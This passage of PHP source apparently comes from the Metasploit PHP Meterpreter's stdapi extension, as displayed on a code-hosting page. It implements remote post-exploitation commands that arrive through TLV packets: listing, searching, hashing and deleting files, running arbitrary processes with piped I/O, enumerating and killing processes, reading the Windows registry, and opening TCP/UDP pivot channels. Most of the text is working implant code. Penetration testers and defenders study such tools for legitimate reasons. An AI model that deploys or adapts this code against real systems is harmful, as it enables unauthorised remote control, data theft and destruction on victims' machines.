&& (!in_array($file,array('.','..'))
# don't follow links to avoid infinite recursion
&& (!is_link($path."/".$file))
)
) {
$glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
($flags&GLOB_PATH?'':$file.'/')));
}
// Match file mask
if (fnmatch($mask,$file)) {
if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
&& ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
&& ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
$glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
}
}
closedir($dir);
if (!($flags&GLOB_NOSORT)) sort($glob);
return $glob;
} else {
return false;
}
}
}
/**
* A better "fnmatch" alternative for windows that converts a fnmatch
* pattern into a preg one. It should work on PHP >= 4.0.0.
* @author soywiz at php dot net
* @since 17-Jul-2006 10:12
*/
if (!function_exists('fnmatch')) {
function fnmatch($pattern, $string) {
return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
}
}
/**
* Prepends $string to each element of $array
* If $deep is true, will indeed also apply to sub-arrays
* @author BigueNique AT yahoo DOT ca
* @since 080324
*/
if (!function_exists('array_prepend')) {
function array_prepend($array, $string, $deep=false) {
if(empty($array)||empty($string)) return $array;
foreach($array as $key => $element)
if(is_array($element))
if($deep)
$array[$key] = array_prepend($element,$string,$deep);
else
trigger_error('array_prepend: array element',E_USER_WARNING);
else
$array[$key] = $string.$element;
return $array;
}
}
## END Search Helpers
if (!function_exists('cononicalize_path')) {
function cononicalize_path($path) {
$path = str_replace(array("/", "\\"), DIRECTORY_SEPARATOR, $path);
return $path;
}
}
#
# Need to nail down what this should actually do. Ruby's File.expand_path is
# for cononicalizing a path (e.g., removing /./ and ../) and expanding "~" into
# a path to the current user's homedir. In contrast, Meterpreter has
# traditionally used this to get environment variables from the server.
#
if (!function_exists('stdapi_fs_file_expand_path')) {
register_command('stdapi_fs_file_expand_path');
function stdapi_fs_file_expand_path($req, &$pkt) {
my_print("doing expand_path");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$env = $path_tlv['value'];
my_print("Request for: '$env'");
if (!is_windows()) {
# Handle some basic windows-isms when we can
switch ($env) {
case "%COMSPEC%":
$path = "/bin/sh";
break;
case "%TEMP%":
case "%TMP%":
$path = "/tmp";
break;
default:
# Don't know what the user meant, just try it as an environment
# variable and hope for the best.
$path = getenv($env);
}
} else {
$path = getenv($env);
if (empty($path) and ($env == "%COMSPEC%")) {
# hope it's in the path
$path = "cmd.exe";
}
}
my_print("Returning with an answer of: '$path'");
if ($path) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_PATH, $path));
return ERROR_SUCCESS;
}
return ERROR_FAILURE;
}
}
if (!function_exists('stdapi_fs_delete_dir')) {
register_command('stdapi_fs_delete_dir');
function stdapi_fs_delete_dir($req, &$pkt) {
my_print("doing rmdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
$ret = @rmdir(cononicalize_path($path_tlv['value']));
return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
}
}
if (!function_exists('stdapi_fs_mkdir')) {
register_command('stdapi_fs_mkdir');
function stdapi_fs_mkdir($req, &$pkt) {
my_print("doing mkdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
$ret = @mkdir(cononicalize_path($path_tlv['value']));
return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
}
}
# works
if (!function_exists('stdapi_fs_chdir')) {
register_command('stdapi_fs_chdir');
function stdapi_fs_chdir($req, &$pkt) {
my_print("doing chdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
$ret = @chdir(cononicalize_path($path_tlv['value']));
return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
}
}
# works
if (!function_exists('stdapi_fs_delete')) {
register_command('stdapi_fs_delete');
function stdapi_fs_delete($req, &$pkt) {
my_print("doing delete");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
$ret = @unlink(cononicalize_path($path_tlv['value']));
return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
}
}
# works
if (!function_exists('stdapi_fs_getwd')) {
register_command('stdapi_fs_getwd');
function stdapi_fs_getwd($req, &$pkt) {
my_print("doing pwd");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_DIRECTORY_PATH, getcwd()));
return ERROR_SUCCESS;
}
}
# works partially, need to get the path argument to mean the same thing as in
# windows
if (!function_exists('stdapi_fs_ls')) {
register_command('stdapi_fs_ls');
function stdapi_fs_ls($req, &$pkt) {
my_print("doing ls");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
$path = cononicalize_path($path_tlv['value']);
$dir_handle = @opendir($path);
if ($dir_handle) {
while ($file = readdir($dir_handle)) {
if ($file != "." && $file != "..") {
#my_print("Adding file $file");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $file));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_PATH, $path . DIRECTORY_SEPARATOR . $file));
$st = stat($path . DIRECTORY_SEPARATOR . $file);
$st_buf = "";
$st_buf .= pack("V", $st['dev']);
$st_buf .= pack("v", $st['ino']);
$st_buf .= pack("v", $st['mode']);
$st_buf .= pack("v", $st['nlink']);
$st_buf .= pack("v", $st['uid']);
$st_buf .= pack("v", $st['gid']);
$st_buf .= pack("v", 0);
$st_buf .= pack("V", $st['rdev']);
$st_buf .= pack("V", $st['size']);
$st_buf .= pack("V", $st['atime']);
$st_buf .= pack("V", $st['mtime']);
$st_buf .= pack("V", $st['ctime']);
$st_buf .= pack("V", $st['blksize']);
$st_buf .= pack("V", $st['blocks']);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_STAT_BUF, $st_buf));
}
}
closedir($dir_handle);
return ERROR_SUCCESS;
} else {
return ERROR_FAILURE;
}
}
}
if (!function_exists('stdapi_fs_separator')) {
register_command('stdapi_fs_separator');
function stdapi_fs_separator($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, DIRECTORY_SEPARATOR));
return ERROR_SUCCESS;
}
}
if (!function_exists('stdapi_fs_stat')) {
register_command('stdapi_fs_stat');
function stdapi_fs_stat($req, &$pkt) {
my_print("doing stat");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
$st = stat($path);
if ($st) {
$st_buf = "";
$st_buf .= pack("V", $st['dev']);
$st_buf .= pack("v", $st['ino']);
$st_buf .= pack("v", $st['mode']);
$st_buf .= pack("v", $st['nlink']);
$st_buf .= pack("v", $st['uid']);
$st_buf .= pack("v", $st['gid']);
$st_buf .= pack("v", 0);
$st_buf .= pack("V", $st['rdev']);
$st_buf .= pack("V", $st['size']);
$st_buf .= pack("V", $st['atime']);
$st_buf .= pack("V", $st['mtime']);
$st_buf .= pack("V", $st['ctime']);
$st_buf .= pack("V", $st['blksize']);
$st_buf .= pack("V", $st['blocks']);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_STAT_BUF, $st_buf));
return ERROR_SUCCESS;
} else {
return ERROR_FAILURE;
}
}
}
# works
if (!function_exists('stdapi_fs_delete_file')) {
register_command('stdapi_fs_delete_file');
function stdapi_fs_delete_file($req, &$pkt) {
my_print("doing delete");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
if ($path && is_file($path)) {
$worked = @unlink($path);
return ($worked ? ERROR_SUCCESS : ERROR_FAILURE);
} else {
return ERROR_FAILURE;
}
}
}
if (!function_exists('stdapi_fs_search')) {
register_command('stdapi_fs_search');
function stdapi_fs_search($req, &$pkt) {
my_print("doing search");
$root_tlv = packet_get_tlv($req, TLV_TYPE_SEARCH_ROOT);
$root = cononicalize_path($root_tlv['value']);
$glob_tlv = packet_get_tlv($req, TLV_TYPE_SEARCH_GLOB);
$glob = cononicalize_path($glob_tlv['value']);
$recurse_tlv = packet_get_tlv($req, TLV_TYPE_SEARCH_RECURSE);
$recurse = $recurse_tlv['value'];
if (!$root) {
$root = '.';
}
my_print("glob: $glob, root: $root, recurse: $recurse");
$flags = GLOB_PATH;
if ($recurse) {
$flags |= GLOB_RECURSE;
}
$files = safe_glob($root ."/". $glob, $flags);
if ($files and is_array($files)) {
dump_array($files);
foreach ($files as $file) {
$file_tlvs = "";
$s = stat($file);
$p = dirname($file);
$f = basename($file);
$file_tlvs .= tlv_pack(create_tlv(TLV_TYPE_FILE_PATH, $p));
$file_tlvs .= tlv_pack(create_tlv(TLV_TYPE_FILE_NAME, $f));
$file_tlvs .= tlv_pack(create_tlv(TLV_TYPE_FILE_SIZE, $s['size']));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_SEARCH_RESULTS, $file_tlvs));
}
}
return ERROR_SUCCESS;
}
}
if (!function_exists('stdapi_fs_md5')) {
register_command("stdapi_fs_md5");
function stdapi_fs_md5($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
if (is_callable("md5_file")) {
$md5 = md5_file($path);
} else {
$md5 = md5(file_get_contents($path));
}
$md5 = pack("H*", $md5);
# Ghetto abuse of file name type to indicate the md5 result
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
return ERROR_SUCCESS;
}
}
if (!function_exists('stdapi_fs_sha1')) {
register_command("stdapi_fs_sha1");
function stdapi_fs_sha1($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
if (is_callable("sha1_file")) {
$sha1 = sha1_file($path);
} else {
$sha1 = sha1(file_get_contents($path));
}
$sha1 = pack("H*", $sha1);
# Ghetto abuse of file name type to indicate the sha1 result
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
return ERROR_SUCCESS;
}
}
# Sys Config
# works
if (!function_exists('stdapi_sys_config_getuid')) {
register_command('stdapi_sys_config_getuid');
function stdapi_sys_config_getuid($req, &$pkt) {
my_print("doing getuid");
if (is_callable('posix_getuid')) {
$uid = posix_getuid();
$pwinfo = posix_getpwuid($uid);
$user = $pwinfo['name'] . " ($uid)";
} else {
# The posix functions aren't available, this is probably windows. Use
# the functions for getting user name and uid based on file ownership
# instead.
$user = get_current_user() . " (" . getmyuid() . ")";
}
packet_add_tlv($pkt, create_tlv(TLV_TYPE_USER_NAME, $user));
return ERROR_SUCCESS;
}
}
# Unimplemented becuase it's unimplementable
#if (!function_exists('stdapi_sys_config_rev2self')) {
#register_command('stdapi_sys_config_rev2self');
#function stdapi_sys_config_rev2self($req, &$pkt) {
# my_print("doing rev2self");
# return ERROR_FAILURE;
#}
#}
# works
if (!function_exists('stdapi_sys_config_sysinfo')) {
register_command('stdapi_sys_config_sysinfo');
function stdapi_sys_config_sysinfo($req, &$pkt) {
my_print("doing sysinfo");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMPUTER_NAME, php_uname("n")));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_OS_NAME, php_uname()));
return ERROR_SUCCESS;
}
}
# Global list of processes so we know what to kill when a channel gets closed
$GLOBALS['processes'] = array();
if (!function_exists('stdapi_sys_process_execute')) {
register_command('stdapi_sys_process_execute');
function stdapi_sys_process_execute($req, &$pkt) {
global $channel_process_map, $processes;
my_print("doing execute");
$cmd_tlv = packet_get_tlv($req, TLV_TYPE_PROCESS_PATH);
$args_tlv = packet_get_tlv($req, TLV_TYPE_PROCESS_ARGUMENTS);
$flags_tlv = packet_get_tlv($req, TLV_TYPE_PROCESS_FLAGS);
$cmd = $cmd_tlv['value'];
$args = $args_tlv['value'];
$flags = $flags_tlv['value'];
# If there was no command specified, well, a user sending an empty command
# deserves failure.
my_print("Cmd: $cmd $args");
if (0 > strlen($cmd)) {
return ERROR_FAILURE;
}
$real_cmd = $cmd ." ". $args;
$pipe_desc = array(array('pipe','r'), array('pipe','w'));
if (is_windows()) {
# see http://us2.php.net/manual/en/function.proc-open.php#97012
array_push($pipe_desc, array('pipe','a'));
} else {
array_push($pipe_desc, array('pipe','w'));
}
# Now that we've got the command built, run it. If it worked, we'll send
# back a handle identifier.
$handle = proc_open($real_cmd, $pipe_desc, $pipes);
if (!is_resource($handle)) {
return ERROR_FAILURE;
}
if (is_callable('proc_get_status')) {
$status = proc_get_status($handle);
$pid = $status['pid'];
} else {
$pid = 0;
}
$proc = array( 'handle' => $handle, 'pipes' => $pipes );
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, $pid));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PROCESS_HANDLE, count($processes)));
if ($flags & PROCESS_EXECUTE_FLAG_CHANNELIZED) {
my_print("Channelized");
# Then the client wants a channel set up to handle this process' stdio,
# register all the necessary junk to make that happen.
foreach ($pipes as $p) {
register_stream($p);
}
#stream_set_blocking($pipes[0], 1);
#stream_set_blocking($pipes[1], 1);
#stream_set_blocking($pipes[2], 1);
$cid = register_channel($pipes[0], $pipes[1], $pipes[2]);
$channel_process_map[$cid] = $proc;
$proc['cid'] = $cid;
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $cid));
#} else {
# Otherwise, don't care about stdin/stdout, just run the command
}
$processes[] = $proc;
return ERROR_SUCCESS;
}
}
if (!function_exists('stdapi_sys_process_close')) {
register_command('stdapi_sys_process_close');
function stdapi_sys_process_close($req, &$pkt) {
global $processes;
my_print("doing process_close");
$handle_tlv = packet_get_tlv($req, TLV_TYPE_PROCESS_HANDLE);
if (array_key_exists($handle_tlv['value'], $processes)) {
close_process($processes[$handle_tlv['value']]);
}
return ERROR_SUCCESS;
}
}
if (!function_exists('close_process')) {
function close_process($proc) {
if ($proc) {
my_print("Closing process handle {$proc['handle']}");
# In the case of a channelized process, this will be redundant as the
# channel_close will also try to close all of these handles. There's no
# real harm in that, so go ahead and just always make sure they get
# closed.
foreach ($proc['pipes'] as $f) {
@fclose($f);
}
if (is_callable('proc_get_status')) {
$status = proc_get_status($proc['handle']);
} else {
# fake a running process on php < 4.3
$status = array('running' => true);
}
# proc_close blocks waiting for the child to exit, so if it's still
# running, don't take a chance on deadlock and just sigkill it if we
# can. We can't on php < 4.3, so don't do anything. This will leave
# zombie processes, but that's better than deadlock.
if ($status['running'] == false) {
proc_close($proc['handle']);
} else {
if (is_callable('proc_terminate')) {
proc_terminate($proc['handle'], 9);
}
}
if (array_key_exists('cid', $proc) && $channel_process_map[$proc['cid']]) {
unset($channel_process_map[$proc['cid']]);
}
}
}
}
# Works, but not very portable. There doesn't appear to be a PHP way of
# getting a list of processes, so we just shell out to ps/tasklist.exe. I need
# to decide what options to send to ps for portability and for information
# usefulness.
if (!function_exists('stdapi_sys_process_get_processes')) {
register_command('stdapi_sys_process_get_processes');
function stdapi_sys_process_get_processes($req, &$pkt) {
my_print("doing get_processes");
$list = array();
if (is_windows()) {
# This command produces a line like:
# "tasklist.exe","2264","Console","0","4,556 K","Running","EGYPT-B3E55BF3C\Administrator","0:00:00","OleMainThreadWndName"
$output = my_cmd("tasklist /v /fo csv /nh");
$lines = explode("\n", trim($output));
foreach ($lines as $line) {
$line = trim($line);
#
# Ghetto CSV parsing
#
$pieces = preg_split('/","/', $line);
# Strip off the initial quote on the first and last elements
$pieces[0] = substr($pieces[0], 1, strlen($pieces[0]));
$cnt = count($pieces) - 1;
$pieces[$cnt] = substr($pieces[$cnt], 1, strlen($pieces[$cnt]));
$proc_info = array($pieces[1], $pieces[6], $pieces[0]);
array_push($list, $proc_info);
}
} else {
# This command produces a line like:
# 1553 root /sbin/getty -8 38400 tty1
$output = my_cmd("ps ax -w -o pid,user,cmd --no-header 2>/dev/null");
$lines = explode("\n", trim($output));
foreach ($lines as $line) {
array_push($list, preg_split("/\s+/", trim($line)));
}
}
foreach ($list as $proc) {
$grp = "";
$grp .= tlv_pack(create_tlv(TLV_TYPE_PID, $proc[0]));
$grp .= tlv_pack(create_tlv(TLV_TYPE_USER_NAME, $proc[1]));
$grp .= tlv_pack(create_tlv(TLV_TYPE_PROCESS_NAME, $proc[2]));
# Strip the pid and the user name off the front; the rest will be the
# full command line
array_shift($proc);
array_shift($proc);
$grp .= tlv_pack(create_tlv(TLV_TYPE_PROCESS_PATH, join($proc, " ")));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PROCESS_GROUP, $grp));
}
return ERROR_SUCCESS;
}
}
# works
if (!function_exists('stdapi_sys_process_getpid')) {
register_command('stdapi_sys_process_getpid');
function stdapi_sys_process_getpid($req, &$pkt) {
my_print("doing getpid");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, getmypid()));
return ERROR_SUCCESS;
}
}
if (!function_exists('stdapi_sys_process_kill')) {
register_command('stdapi_sys_process_kill');
function stdapi_sys_process_kill($req, &$pkt) {
# The existence of posix_kill is unlikely (it's a php compile-time option
# that isn't enabled by default, but better to try it and avoid shelling
# out when unnecessary.
my_print("doing kill");
$pid_tlv = packet_get_tlv($req, TLV_TYPE_PID);
$pid = $pid_tlv['value'];
if (is_callable('posix_kill')) {
$ret = posix_kill($pid, 9);
$ret = $ret ? ERROR_SUCCESS : posix_get_last_error();
if ($ret != ERROR_SUCCESS) {
my_print(posix_strerror($ret));
}
} else {
$ret = ERROR_FAILURE;
if (is_windows()) {
my_cmd("taskkill /f /pid $pid");
# Don't know how to check for success yet, so just assume it worked
$ret = ERROR_SUCCESS;
} else {
if ("foo" == my_cmd("kill -9 $pid && echo foo")) {
$ret = ERROR_SUCCESS;
}
}
}
return $ret;
}
}
if (!function_exists('stdapi_net_socket_tcp_shutdown')) {
register_command('stdapi_net_socket_tcp_shutdown');
function stdapi_net_socket_tcp_shutdown($req, &$pkt) {
my_print("doing stdapi_net_socket_tcp_shutdown");
$cid_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
$c = get_channel_by_id($cid_tlv['value']);
if ($c && $c['type'] == 'socket') {
@socket_shutdown($c[0], $how);
$ret = ERROR_SUCCESS;
} else {
$ret = ERROR_FAILURE;
}
return $ret;
}
}
#
# Registry
#
if (!function_exists('register_registry_key')) {
$_GLOBALS['registry_handles'] = array();
function register_registry_key($key) {
global $registry_handles;
$registry_handles[] = $key;
return count($registry_handles) - 1;
}
}
if (!function_exists('deregister_registry_key')) {
function deregister_registry_key($id) {
global $registry_handles;
$registry_handles[$id] = null;
}
}
if (!function_exists('stdapi_registry_create_key')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_create_key');
}
function stdapi_registry_create_key($req, &$pkt) {
my_print("doing stdapi_registry_create_key");
if (is_windows() and is_callable('reg_open_key')) {
$root_tlv = packet_get_tlv($req, TLV_TYPE_ROOT_KEY);
$base_tlv = packet_get_tlv($req, TLV_TYPE_BASE_KEY);
$perm_tlv = packet_get_tlv($req, TLV_TYPE_PERMISSION);
dump_array($root_tlv);
dump_array($base_tlv);
# For some reason the php constants for registry root keys do not have
# the high bit set and are 1 less than the normal Windows constants, so
# fix it here.
$root = ($root_tlv['value'] & ~0x80000000) + 1;
$base = $base_tlv['value'];
my_print("reg opening '$root', '$base'");
$key = reg_open_key($root, $base);
if (!$key) {
my_print("reg open failed: $key");
return ERROR_FAILURE;
}
$key_id = register_registry_key($key);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_HKEY, $key_id));
return ERROR_SUCCESS;
} else {
return ERROR_FAILURE;
}
}
}
if (!function_exists('stdapi_registry_close_key')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_close_key');
}
function stdapi_registry_close_key($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
global $registry_handles;
my_print("doing stdapi_registry_close_key");
$key_id_tlv = packet_get_tlv($req, TLV_TYPE_ROOT_KEY);
$key_id = $key_id_tlv['value'];
reg_close_key($registry_handles[$key_id]);
deregister_registry_key($key_id);
return ERROR_SUCCESS;
} else {
return ERROR_FAILURE;
}
}
}
if (!function_exists('stdapi_registry_query_value')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_query_value');
}
function stdapi_registry_query_value($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
global $registry_handles;
my_print("doing stdapi_registry_query_value");
$key_id_tlv = packet_get_tlv($req, TLV_TYPE_HKEY);
$key_id = $key_id_tlv['value'];
$name_tlv = packet_get_tlv($req, TLV_TYPE_VALUE_NAME);
$name = $name_tlv['value'];
#my_print("Looking up stored key handle $key_id");
#dump_array($registry_handles, "Reg handles");
$key = $registry_handles[$key_id];
if (!$key) {
return ERROR_FAILURE;
}
$data = reg_get_value($key, $name);
my_print("Found data for $key\\$name : $data, ". is_int($data));
# There doesn't appear to be an API to get the type, all we can do is
# infer based on what the value looks like. =(
if (is_int($data)) {
$type = REG_DWORD;
$data = pack("N", (int)$data);
} else {
$type = REG_SZ;
# The api strips the null for us, so put it back
$data = $data ."\x00";
}
packet_add_tlv($pkt, create_tlv(TLV_TYPE_VALUE_DATA, $data));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_VALUE_TYPE, $type));
} else {
return ERROR_FAILURE;
}
}
}
if (!function_exists('stdapi_registry_set_value')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_set_value');
}
function stdapi_registry_set_value($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
global $registry_handles;
my_print("doing stdapi_registry_set_value");
$key_id_tlv = packet_get_tlv($req, TLV_TYPE_ROOT_KEY);
$key_id = $key_id_tlv['value'];
} else {
return ERROR_FAILURE;
}
}
}
# END STDAPI
##
# Channel Helper Functions
##
if (!function_exists('channel_create_stdapi_fs_file')) {
function channel_create_stdapi_fs_file($req, &$pkt) {
$fpath_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$mode_tlv = packet_get_tlv($req, TLV_TYPE_FILE_MODE);
#my_print("Opening path {$fpath_tlv['value']} with mode {$mode_tlv['value']}");
if (!$mode_tlv) {
$mode_tlv = array('value' => 'rb');
}
$fd = @fopen($fpath_tlv['value'], $mode_tlv['value']);
if (is_resource($fd)) {
register_stream($fd);
$id = register_channel($fd);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $id));
return ERROR_SUCCESS;
} else {
my_print("Failed to open");
}
return ERROR_FAILURE;
}
}
if (!function_exists('channel_create_stdapi_net_tcp_client')) {
function channel_create_stdapi_net_tcp_client($req, &$pkt) {
my_print("creating tcp client");
$peer_host_tlv = packet_get_tlv($req, TLV_TYPE_PEER_HOST);
$peer_port_tlv = packet_get_tlv($req, TLV_TYPE_PEER_PORT);
$local_host_tlv = packet_get_tlv($req, TLV_TYPE_LOCAL_HOST);
$local_port_tlv = packet_get_tlv($req, TLV_TYPE_LOCAL_PORT);
$retries_tlv = packet_get_tlv($req, TLV_TYPE_CONNECT_RETRIES);
if ($retries_tlv['value']) {
$retries = $retries_tlv['value'];
} else {
$retries = 1;
}
for ($i = 0; $i < $retries; $i++) {
$sock = connect($peer_host_tlv['value'], $peer_port_tlv['value']);
if ($sock) {
break;
}
}
if (!$sock) {
return ERROR_CONNECTION_ERROR;
}
#
# If we got here, the connection worked, respond with the new channel ID
#
$id = register_channel($sock);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $id));
add_reader($sock);
return ERROR_SUCCESS;
}
}
if (!function_exists('channel_create_stdapi_net_udp_client')) {
function channel_create_stdapi_net_udp_client($req, &$pkt) {
my_print("creating udp client");
$peer_host_tlv = packet_get_tlv($req, TLV_TYPE_PEER_HOST);
$peer_port_tlv = packet_get_tlv($req, TLV_TYPE_PEER_PORT);
# We can't actually do anything with local_host and local_port because PHP
# doesn't let us specify these values in any of the exposed socket API
# functions.
#$local_host_tlv = packet_get_tlv($req, TLV_TYPE_LOCAL_HOST);
#$local_port_tlv = packet_get_tlv($req, TLV_TYPE_LOCAL_PORT);
$sock = connect($peer_host_tlv['value'], $peer_port_tlv['value'], 'udp');
my_print("UDP channel on {$sock}");
if (!$sock) {
return ERROR_CONNECTION_ERROR;
}
#
# If we got here, the connection worked, respond with the new channel ID
#
$id = register_channel($sock);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $id));
add_reader($sock);
return ERROR_SUCCESS;
}
}
View Git Blame Copy Permalink